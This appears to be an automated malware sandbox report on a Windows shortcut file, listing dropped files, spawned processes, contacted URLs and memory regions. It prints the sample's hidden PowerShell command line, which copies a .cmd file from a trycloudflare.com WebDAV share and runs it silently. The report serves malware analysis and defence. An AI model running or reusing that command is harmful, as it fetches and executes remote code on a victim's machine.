Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
dial.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=1, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06
2018, length=446976, window=hide
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_flxwoel0.hw2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5qocwz3.r0q.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2a91be6132792e1.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EX5A3P9NX28ALOXDO00I.temp
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\badly-andrea-act-barnes.trycloudflare.com@SSL\DavWWWRoot\new.cmd'
\"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\new.cmd\" -WindowStyle Hidden"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 3 hidden URLs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
177FDC32000
|
heap
|
page read and write
|
||
|
3594BFE000
|
stack
|
page read and write
|
||
|
17780C32000
|
trusted library allocation
|
page read and write
|
||
|
3594CFE000
|
stack
|
page read and write
|
||
|
177FDBE0000
|
heap
|
page read and write
|
||
|
35947FE000
|
stack
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1778185A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
177FB808000
|
heap
|
page read and write
|
||
|
177FD380000
|
heap
|
page read and write
|
||
|
177FB7A3000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
359487E000
|
stack
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
35949F7000
|
stack
|
page read and write
|
||
|
177FDA8C000
|
heap
|
page read and write
|
||
|
177FD290000
|
heap
|
page read and write
|
||
|
35941DF000
|
stack
|
page read and write
|
||
|
3594979000
|
stack
|
page read and write
|
||
|
177FDC01000
|
heap
|
page read and write
|
||
|
177FB806000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
177FDBD0000
|
heap
|
page execute and read and write
|
||
|
177FD920000
|
heap
|
page execute and read and write
|
||
|
35945FE000
|
stack
|
page read and write
|
||
|
177FB720000
|
heap
|
page read and write
|
||
|
177FD990000
|
heap
|
page read and write
|
||
|
177818E1000
|
trusted library allocation
|
page read and write
|
||
|
177FDAB0000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
177FDA69000
|
heap
|
page read and write
|
||
|
35946FF000
|
stack
|
page read and write
|
||
|
177FD9C5000
|
heap
|
page read and write
|
||
|
35948FD000
|
stack
|
page read and write
|
||
|
177FB80C000
|
heap
|
page read and write
|
||
|
17781B63000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
177FDA08000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
3594B7E000
|
stack
|
page read and write
|
||
|
35944FD000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
177FB729000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1778008B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
1779006F000
|
trusted library allocation
|
page read and write
|
||
|
177FB8F0000
|
heap
|
page read and write
|
||
|
17781C2C000
|
trusted library allocation
|
page read and write
|
||
|
177FDA06000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
177FDA48000
|
heap
|
page read and write
|
||
|
177901B1000
|
trusted library allocation
|
page read and write
|
||
|
17781885000
|
trusted library allocation
|
page read and write
|
||
|
17780232000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
177FD343000
|
trusted library allocation
|
page read and write
|
||
|
177FD2C0000
|
trusted library allocation
|
page read and write
|
||
|
177FB940000
|
heap
|
page read and write
|
||
|
17790001000
|
trusted library allocation
|
page read and write
|
||
|
1778117F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
177FDA70000
|
heap
|
page read and write
|
||
|
177FB700000
|
heap
|
page read and write
|
||
|
177FB7DE000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
177FD295000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
177FB945000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
177FB7C4000
|
heap
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
177FD300000
|
heap
|
page readonly
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
17780001000
|
trusted library allocation
|
page read and write
|
||
|
177FD7A7000
|
heap
|
page read and write
|
||
|
177FB79B000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1778183C000
|
trusted library allocation
|
page read and write
|
||
|
177FD980000
|
heap
|
page execute and read and write
|
||
|
17781834000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
17790010000
|
trusted library allocation
|
page read and write
|
||
|
177FB799000
|
heap
|
page read and write
|
||
|
177FD450000
|
heap
|
page read and write
|
||
|
3594D7B000
|
stack
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
17781C28000
|
trusted library allocation
|
page read and write
|
||
|
1779007B000
|
trusted library allocation
|
page read and write
|
||
|
1778183A000
|
trusted library allocation
|
page read and write
|
||
|
177FD9BE000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
3594AFA000
|
stack
|
page read and write
|
||
|
177FD2F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
177FD0F0000
|
heap
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
177FB910000
|
heap
|
page read and write
|
||
|
177FD390000
|
trusted library allocation
|
page read and write
|
||
|
177FB732000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
359457E000
|
stack
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
|
3594475000
|
stack
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF477220000
|
trusted library allocation
|
page execute and read and write
|
||
|
177FB756000
|
heap
|
page read and write
|
||
|
3594A7C000
|
stack
|
page read and write
|
||
|
359574F000
|
stack
|
page read and write
|
||
|
177FB797000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
359477B000
|
stack
|
page read and write
|
||
|
177FDBD7000
|
heap
|
page execute and read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
359467E000
|
stack
|
page read and write
|
||
|
177FB7BE000
|
heap
|
page read and write
|
||
|
177FB7CA000
|
heap
|
page read and write
|
||
|
177FD340000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
There are 122 hidden memdumps, click here to show them.